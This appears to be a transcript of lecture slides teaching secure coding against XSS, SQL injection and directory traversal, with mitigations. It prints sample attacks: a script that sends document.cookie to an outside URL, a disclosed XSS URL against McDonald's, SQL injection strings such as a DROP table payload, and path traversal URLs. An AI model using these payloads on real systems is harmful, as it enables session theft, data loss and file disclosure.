secure software engineering: input vulnerabilities cpsc 410
TRANSCRIPT
Secure Software Engineering: Input Vulnerabilities
CPSC 410
Input Vulnerabilities
• We all know not to run “code” retrieved from suspicious places
• But passive “data” may beinterpreted as malicious instructions
System.out.println(“/etc/password”);vs.
File file = new File(“/etc/password”);
3 Most Common Input Vulnerabilities on Web
1. Cross-site Scripting
2. SQL Injection
3. Directory Traversal
See http://www.owasp.com - the Open Web App Security Project
Cross Site Scripting• Web browsers should only execute JavaScript
from sites that you visit• But … Web sites often echo values given as input,
e.g.Input: http://www.foo.com?username=‘Eric’Output page: Hello Eric• If we put JavaScript into an input, an output page
could include that JavaScript!• The tester must assume every data entry point is
a possible XSS hole.
Example: Invectus on Macdonald’s http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
http://www.mcdonalds.com/content/us/en/search/search_results.html?
queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
queryText=”><img src=”http://i55.tinypic.com/witu7d.png” height=”650″ width=”1000″>
Source:http://www.acunetix.com/blog/news/full-disclosure-high-profile-websites-xss/
Malicious Script Input
• Basic example (assume URL encoding)
http://www.foo.com?username=<script>alert(“Hello World”)</script>
• Steal user’s cookies
<script type='text/javascript'>var img = document.createElement('img'); img.setAttribute('src', ‘http://localhost:8080?cook=' + escape(document.cookie)); document.body.appendChild(img);
</script>
GWT vulnerabilities
• JavaScript on your host page that is unrelated to GWT
• Code you write that sets innerHTML on GWT Widget objects
• Using the JSON API to parse untrusted strings (which ultimately calls JavaScript's eval function)
• JavaScript Native Interface (JSNI) code that you write that does something unsafe (such as setting innerHTML, calling eval, writing directly to the document via document.write, etc.)
Src: https://developers.google.com/web-toolkit/articles/security_for_gwt_applications#xss
InnerHTML example<html><head> <script language="JavaScript"> function fillMyDiv(newContent) { document.getElementById('mydiv').innerHTML = newContent; } </script></head><body> <p>Some text before mydiv.</p> <div id="mydiv"></div> <p>Some text after mydiv.</p></body></html>
GWT Guidelines
• Carefully inspect and strip or escape any strings you assign to innerHTML using GWT code
• Carefully inspect any JavaScript strings you pass to GWT's JSON parser
• Carefully inspect any strings you pass to eval or assign to innerHTML via a JSNI method
• Take care in your native JSNI methods to not do anything that would expose you to attacks
Best Solution
• Filter any data which is echo’d back to HTML• e.g.
– http://josephoconnell.com/java/xss-html-filter/
String input = request.getParameter(“data”);String clean = new HTMLInputFilter().filter( input );
Simple Web App
• A Web form that allows the user to look up account details• Underneath – a Java Web application serving the requests
SQL Injection Example• Happy-go-lucky SQL statement:
• Leads to SQL injection– One of the most common Web application vulnerabilities caused
by lack of input validation• But how?
– Typical way to construct a SQL query using string concatenation– Looks benign on the surface – But let’s play with it a bit more…
String query = “SELECT Username, UserID, Password
FROM Users WHERE username =“ + user
+ “ AND password =“ +
password;
Injecting Malicious Data (1)
query = “SELECT Username,
UserID, Password
FROM Users WHERE
Username = 'bob'
AND Password = ‘********‘”
Press “Submit”
Injecting Malicious Data (2)
query = “SELECT Username,
UserID, Password
FROM Users WHERE
Username = 'bob’--
’ AND Password = ‘‘”
Press “Submit”
Injecting Malicious Data (3)
query = “SELECT Username,
UserID, Password
FROM Users WHERE
Username = 'bob’; DROP Users--
’ AND Password = ‘‘”
Press “Submit”
Heart of the Issue: Tainted Input Data
Web Apphacker
browser
applicationevil
input
database
output
input evil
Insert input checking!
cross-site scripting
SQL injections
Bobby Tables
http://xkcd.com/327/
Mitigating SQL Injection• Always use Prepared Statements or Stored Procedures
– Instead of:stmt.execute(
"UPDATE EMPLOYEES SET SALARY = “+input1+“ WHERE ID = “ + input2);
– Use:PreparedStatement pstmt = conn.prepareStatement(
"UPDATE EMPLOYEES SET SALARY = ? WHERE ID = ?“); pstmt.setBigDecimal(1, input1) pstmt.setInt(2, input2)
• The account used to make the database connection must have “Least privilege.” If the application only requires read access then the account must be given read access only.
• Avoid disclosing error information: Weak error handling is a great way for an attacker to profile SQL injection attacks.
‘SQL’ injection on GWT
• More a vulnerability of the RPC services– Could send arbitrary data to your datastore (once
the Javascript is de-obfuscated)
• Also possible to do JDOQL injection– Use Query object and parameters instead of String
syntaxQuery query = pm.newQuery(Employee.class);query.setFilter("lastName == lastNameParam");query.setOrdering("hireDate desc");query.declareParameters("String lastNameParam");
…List<Employee> results = (List<Employee>) query.execute("Smith");query.closeAll();
Recent Examples
• On March 27, 2011 mysql.com, the official homepage for MySQL, was compromised
• On June 1, 2011, LulzSec steal information from Sony PS3 users
• In August, 2011, Hacker Steals User Records From Nokia Developer Site
Directory/Path Traversal• Occurs when user input is used to create the path for
reading a file on disk
http://myblog.com/view?photo=eric.jpg
String file = request.getParameter(“photo”)new File(“/images/” + file);
See https://www.owasp.org/index.php/Path_Traversal
Directory TraversalMalicious input:http://myblog.com/view?photo=../../../../../Windows/system.ini
• Has been used to retrieve – “web.xml” files– Apache conf files– UNIX password files
• Other exampleYou let user choose between different style
templates and save the template filename in their profile
Example 2• http://some_site.com.br/get-files.jsp?
file=report.pdf • http://some_site.com.br/get-page.php?
home=aaa.html • In these examples it’s possible to insert a
malicious string as the variable parameter to access files located outside the web publish directory.
• http://some_site.com.br/get-files?file=../../../../some dir/some file
• http://some_site.com.br/../../../../some dir/some file
Best Solution
• Don’t construct file paths from user input• Understand how your web server handles file
access.• Create a UUID (Universally Unique IDentifier)
for each file and save as a column with datauuid = UUID.randomUUID().toString()
File savedFile = File(uuid);
• Example database table for images
picID picName picDesc picOwner picFormat uuid
2 Rules to Remember
1. Always assume many users are malicious and want to break your software
2. Don’t assume a Web site is always accessed through a normal Web Browser
Famous last words, “I wrote the JavaScript so that this would never happen”